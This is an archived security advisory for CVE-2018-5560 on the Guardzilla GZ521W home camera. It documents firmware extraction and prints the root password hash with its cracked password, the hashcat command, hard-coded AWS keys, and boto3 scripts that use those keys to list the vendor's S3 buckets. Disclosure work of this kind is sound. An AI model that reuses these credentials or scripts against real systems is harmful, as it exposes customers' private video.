Charles Dardaman

Security engineering, incident response, research.

Guardzilla IoT Video Camera Hard-Coded Credentials (CVE-2018-5560)

Originally published at https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/. An archived copy appears below.

Researcher Contact Information

Name Contact Role
Nick McClendon [email protected] Dumped the firmware and extracted the binaries
Andrew Mirghassemi [email protected] Dumped the firmware and extracted the binaries
Charles Dardaman @CharlesDardaman Found and extracted the AWS credentials from the binaries
INIT_6 @INIT_3 Co-founder of 0DayAllDay, cracked the root password
Chris [email protected] Co-founder of 0DayAllDay, AWS policy verification

Executive Summary

During the 0DAYALLDAY Research Event a vulnerability (CVE-2018-5560) in the Guardzilla Security Video System (Model #: GZ521W) was discovered. The vulnerability lies within the design and implementation of Amazon Simple Storage Service (S3) credentials inside the Guardzilla security camera firmware. Accessing these S3 storage credentials is trivial for a moderately skilled attacker.

Upon inspection of the access rights given to the S3 credentials within the analyzed firmware it was discovered that the embedded S3 credentials have unlimited access to all S3 buckets provisioned for that account.

While no user data was accessed during our testing, the embedded S3 credentials could easily be used to view and download any stored file or video in the associated buckets.

This issue is an instance of CWE-798: Use of Hard-coded Credentials. It has a CVSSv3 base score of 8.6, since once the password is known, any unauthenticated user can collect the data from any affected system over the internet.

Product Description

The Guardzilla All-In-One Video Security System is a home security platform that provides indoor video surveillance. More information about the product can be found at the vendor’s website. Only the GZ501W model was tested. It is not known if other models are affected.

Findings Overview

This section summarizes the strategic problems identified, risk ratings, and recommendations. The Detailed Testing section describes the attempted attacks, evidence (including screenshots), risk ratings, and potential solutions. The results from this testing as well as any additional details regarding any further exposure can be found in the Detailed Testing section.

Device Guardzilla GZ521W Security Video System
Finding Risk Rating Remediation Status
Embedded S3 credentials unlimited access policy CRITICAL Vulnerable
OpenSSL 1.0.1g multiple vulnerabilities HIGH Vulnerable

Strategic Recommendations

Strategic recommendations are those actions that can be taken by an organization to address the findings outlined in the findings overview section of this executive summary in a more generic and global way, rather than fixing individual problems instance by instance.

Implementing one or more of these recommendations may greatly improve the security posture of an organization and/or reduce the attack surface or exposure of an application or environment as well as address multiple findings.

Recommendation for Guardzilla:

Benefits:

Detailed Technical Description

During the event a Winbond SPIFlash chip (Model #: 25Q128FVSG) was identified. The data sheet for the chip can be found here.

Once the firmware was extracted from that chip it was identified to contain a SquashFS file system and a Journaling Flash File System version 2 (JFFS2) file system. It was also noted that the “Distribution Base” is Grain Media ARM Linux 3.3.

Once these file systems were extracted with binwalk, the following string was found in the Message of the Day (MOTD):

Copyright (C) 2005 Faraday Corp. www.faraday.com.tw

It was also noted that the /etc/shadow file contained the following DES encrypted password for the root administrator account:

root:MvynOwD449PkM:0:0:99999:7:::

Because DES has been deprecated since 2005 it was trivially cracked with dual Nvidia GeForce GTX 1080 Ti graphics cards:

hashcat -m 1500 -a 3 -o ../guardzilla.found -O -i --increment-min=8 --increment-max=12 -w 3 -t 50 ../guardzilla.hash ?a?a?a?a?a?a?a?a?a?a?a?a?a
Session..........: hashcat
Status...........: Cracked
Hash.Type........: descrypt, DES (Unix), Traditional DES
Hash.Target......: MvynOwD449PkM
Time.Started.....: Tue Oct  2 07:36:30 2018 (3 hours, 35 mins)
Time.Estimated...: Tue Oct  2 11:12:06 2018 (0 secs)
Guess.Mask.......: ?a?a?a?a?a?a?a?a [8]
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:  1176.6 MH/s (49.11ms) @ Accel:8 Loops:1024 Thr:256 Vec:1
Speed.Dev.#2.....:   776.5 MH/s (106.80ms) @ Accel:16 Loops:1024 Thr:256 Vec:1
Speed.Dev.#*.....:  1953.0 MH/s
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 25226596581376/39062500000000 (64.58%)
Rejected.........: 0/25226596581376 (0.00%)
Restore.Point....: 201580544/312500000 (64.51%)
Candidates.#1....: sarKrvcz -> 9poL82dw
Candidates.#2....: AiLwoz3x -> jE3iABuo
HWMon.Dev.#1.....: Temp: 66c Fan: 99% Util: 99% Core:1797MHz Mem:5005MHz Bus:8
HWMon.Dev.#2.....: Temp: 82c Fan: 99% Util:100% Core:1632MHz Mem:4513MHz Bus:8

The recovered password: GMANCIPC

It was noted that during boot the init script launches boot.sh which in turn launches both /mnt/mtd/startapp and /home/daemon.exe. The startapp resource launches vg_boot.sh (which configures low level video settings) and main.exe. The following table represents the binary information for both main.exe and daemon.exe:

Guardzilla core binary data
Binary Architecture Type EABI Link Type Interpreter Symbols
main.exe ELF 32-bit ARM 5 version 1 Dynamically linked /lib/ld-uClibc.so.0 Stripped
daemon.exe ELF 32-bit ARM 5 version 1 Dynamically linked /lib/ld-uClibc.so.0 Not stripped

Embedded S3 Credentials Unlimited Access Policy

Once the binaries were extracted from the firmware they were analyzed in IDA Pro to determine if any vulnerabilities could be identified. Once main.exe had been disassembled and analyzed it was noted that a set of strings resembled AWS credentials:

IDA Pro screenshot showing AWS-related strings

Following the references, we can see that they are exports from the binary that are labeled: accessKey, secretAccessKey, hostname, and bucket. This format lines up with how AWS bucket keys are designed:

IDA Pro screenshot highlighting exported AWS credential strings
AccessKeyIdG AKIAJQDP34RKL7GGV7OQ
secretAccessKeyG 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
hostName s3.amazonaws.com
bucket motion-detection

The following script was developed to test the S3 credentials to determine if they were valid as well as determine what access writes the credentials had:

import boto3
# Create an S3 client
s3 = boto3.client('s3',
                  aws_access_key_id='AKIAJQDP34RKL7GGV7OQ',
                  aws_secret_access_key='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',
                  region_name='us-west-1')

try:
    result = s3.get_bucket_policy(Bucket='motion-detection')
    print(result)
except Exception as e:
    print(e)

When the script was run it errored out stating that no specific policy exists on the embedded credentials for the motion-detection bucket:

An error occurred (NoSuchBucketPolicy) when calling the GetBucketPolicy operation: The bucket policy does not exist

The previously mentioned script was modified to list any available S3 buckets accessible by the embedded credentials:

import boto3
# Create an S3 client
s3 = boto3.client('s3',
                  aws_access_key_id='AKIAJQDP34RKL7GGV7OQ',
                  aws_secret_access_key='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',
                  region_name='us-west-1')

try:
    result = s3.list_buckets()
    print(result)
except Exception as e:
    print(e)

Once run that script lists all buckets accessible by the embedded credentials:

{
    'Buckets': [{
        'CreationDate': datetime.datetime(2017, 2, 16, 21, 52, 52, tzinfo=tzutc()),
        'Name': 'elasticbeanstalk-us-west-2-036770821135'
    }, {
        'CreationDate': datetime.datetime(2018, 4, 5, 15, 45, 22, tzinfo=tzutc()),
        'Name': 'facial-detection'
    }, {
        'CreationDate': datetime.datetime(2017, 11, 8, 19, 38, 15, tzinfo=tzutc()),
        'Name': 'free-video-storage'
    }, {
        'CreationDate': datetime.datetime(2018, 3, 9, 20, 7, 19, tzinfo=tzutc()),
        'Name': 'free-video-storage-persist'
    }, {
        'CreationDate': datetime.datetime(2016, 8, 15, 19, 53, 12, tzinfo=tzutc()),
        'Name': 'gz-rds-backups'
    }, {
        'CreationDate': datetime.datetime(2017, 11, 8, 19, 37, 44, tzinfo=tzutc()),
        'Name': 'gz-test-bucket'
    }, {
        'CreationDate': datetime.datetime(2017, 11, 8, 19, 38, 29, tzinfo=tzutc()),
        'Name': 'motion-detection'
    }, {
        'CreationDate': datetime.datetime(2017, 11, 8, 19, 38, 47, tzinfo=tzutc()),
        'Name': 'premium-video-storage'
    }, {
        'CreationDate': datetime.datetime(2018, 3, 9, 20, 6, 47, tzinfo=tzutc()),
        'Name': 'premium-video-storage-persist'
    }, {
        'CreationDate': datetime.datetime(2018, 1, 25, 20, 41, 16, tzinfo=tzutc()),
        'Name': 'rekognition-video-console-demo-cmh-guardzilla-2918n05v5rvh'
    }, {
        'CreationDate': datetime.datetime(2017, 5, 17, 16, 1, 9, tzinfo=tzutc()),
        'Name': 'setup-videos'
    }, {
        'CreationDate': datetime.datetime(2018, 1, 24, 23, 0, 39, tzinfo=tzutc()),
        'Name': 'wowza-test-bucket'
    }],
    'Owner': {
        'ID': 'a3db77fe2a21093a2f0d471b0a9677f8aff7c3c7b7a4944b752ccc0c3a4a4af7',
        'DisplayName': 'geoff'
    }
}

Using the PACU AWS framework it was determined that the embedded credentials don’t have permission to gather further details on policies:

{
  "AccessKeyId": "AKIAJQDP34RKL7GGV7OQ",
  "Arn": "arn:aws:iam::036770821135:user/motion-detection",
  "Roles": null,
  "KeyAlias": "Guardzilla",
  "AccountId": "036770821135",
  "UserId": "AIDAJQRSLLW52U7GLHFYE",
  "Groups": [],
  "Policies": [],
  "Permissions": {
    "Deny": {},
    "Allow": {}
  },
  "SecretAccessKey": "igH8yFmmpMbnkcUaCqXJIRIozKVaXaRhE7PWHAYa",
  "UserName": "",
  "RoleName": null,
  "SessionToken": null,
  "PermissionsConfirmed": false
}

No further testing against the credentials was done to prevent the unintentional access of Guardzilla customer data.

OpenSSL 1.0.1g Multiple Vulnerabilities

It was also noted that an out-of-date OpenSSL library was being referenced inside the firmware. The following table represents the publicly identified vulnerabilities affecting OpenSSL version 1.0.1g.

OpenSSL 1.0.1g public vulnerabilities
CVE Number Date Published Risk Rating
CVE-2016-0705 2016-03-03 CRITICAL
Description
Double free vulnerability in the dsa_priv_decode function in crypto/dsa/dsa_ameth.c in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a malformed DSA private key.
CVE-2015-0292 2015-03-19 HIGH
Description
Integer underflow in the EVP_DecodeUpdate function in crypto/evp/encode.c in the base64-decoding implementation in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted base64 data that triggers a buffer overflow.
CVE-2014-8176 2015-06-12 HIGH
Description
The dtls1_clear_queues function in ssl/d1_lib.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h frees data structures without considering that application data can arrive between a ChangeCipherSpec message and a Finished message, which allows remote DTLS peers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via unexpected application data.
CVE-2016-0797 2016-03-03 MEDIUM
Description
Multiple integer overflows in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g allow remote attackers to cause a denial of service (heap memory corruption or NULL pointer dereference) or possibly have unspecified other impact via a long digit string that is mishandled by the (1) BN_dec2bn or (2) BN_hex2bn function, related to crypto/bn/bn.h and crypto/bn/bn_print.c.
CVE-2015-0287 2015-03-19 MEDIUM
Description
The ASN1_item_ex_d2i function in crypto/asn1/tasn_dec.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not reinitialize CHOICE and ADB data structures, which might allow attackers to cause a denial of service (invalid write operation and memory corruption) by leveraging an application that relies on ASN.1 structure reuse.
CVE-2015-0209 2015-03-19 MEDIUM
Description
Use-after-free vulnerability in the d2i_ECPrivateKey function in crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a malformed Elliptic Curve (EC) private-key file that is improperly handled during import.

Informational Findings

During the review it was noted that the Guardzilla camera listens on port 23 with an “ipc login” prompt by default. It was also noted a large amount of UDP traffic was being sent to a US-EAST-2 Amazon server. We also noted several HTTP requests going out to:

54.68.243.114 (ec2-54-68-243-114.us-west-2.compute.amazonaws.com)
http://54.68.243.114/apns/apns.php?cmd=reg_server&uid=G1KEXWU2BPWHCFZ5111A
http://54.68.243.114/apns/apns.php?cmd=raise_event&uid=G1KEXWU2BPWHCFZ5111A&event_type=1&event_time=1538239032
52.218.200.66 (s3-us-west-2-w.amazonaws.com)

During the binary review several external IP's were identified as well as several external data sources. The following table represents all identified external IPs and data sources identified within the main.exe binary:

Guardzilla main.exe external hardcoded IP and data sources
Host Data source information
61.220.62.219 HiNet, Taiwan
203.69.81.91 HiNet, Taiwan
210.61.248.232 HiNet, Taiwan
42.99.254.162 Pacnet Services, Japan
50.19.254.134 Amazon US-EAST-1, Virginia
122.248.234.207 Amazon AP-SOUTHEAST-1, Singapore
46.137.188.54 Amazon EU-WEST-1, Ireland
122.226.84.253 China Telecom, Jinhua, China
61.188.37.216 China Telecom, Chengdu, China
120.24.59.150 Alibaba, Hangzhou, China
114.215.137.159 Aliyun Computing, Hangzhou, China
104.199.156.58 Google Cloud
175.41.238.100 Amazon AP-NORTHEAST-1, Japan
s3.amazonaws.com Amazon
time.windows.com Microsoft
m1.iotcplatform.com ThroughTek Co, China
m2.iotcplatform.com ThroughTek Co, China
m3.iotcplatform.com ThroughTek Co, China
m4.iotcplatform.com ThroughTek Co, China
m5.iotcplatform.com ThroughTek Co, China
dropbox_sendFile_record_del Dropbox
dropbox_sendFile_record_add Dropbox
g_dropboxFileMutex Dropbox
dropbox_sendFile_record_get Dropbox
/mnt/nfs Local NFS

The highlighted hosts should be further investigated to be sure no unintended video surveillance data is being sent to those hosts or providers. The iotcplatform.com host is especially troubling as it has been identified in previous Krebs on Security research.

It was also noted that a suspected UART port was identified on the circuit board. However, Guardzilla removed two pull-up resistors for production units. Replacement resistors were attempted and worked temporarily. We are confident with the correct surface mount resistors connected to the 3.3-volt line and RX and TX lines the UART port would be usable.

Disclosure Timeline

As of this writing the vendor hasn't responded to any communication from Rapid7 or CERT.

Special Thanks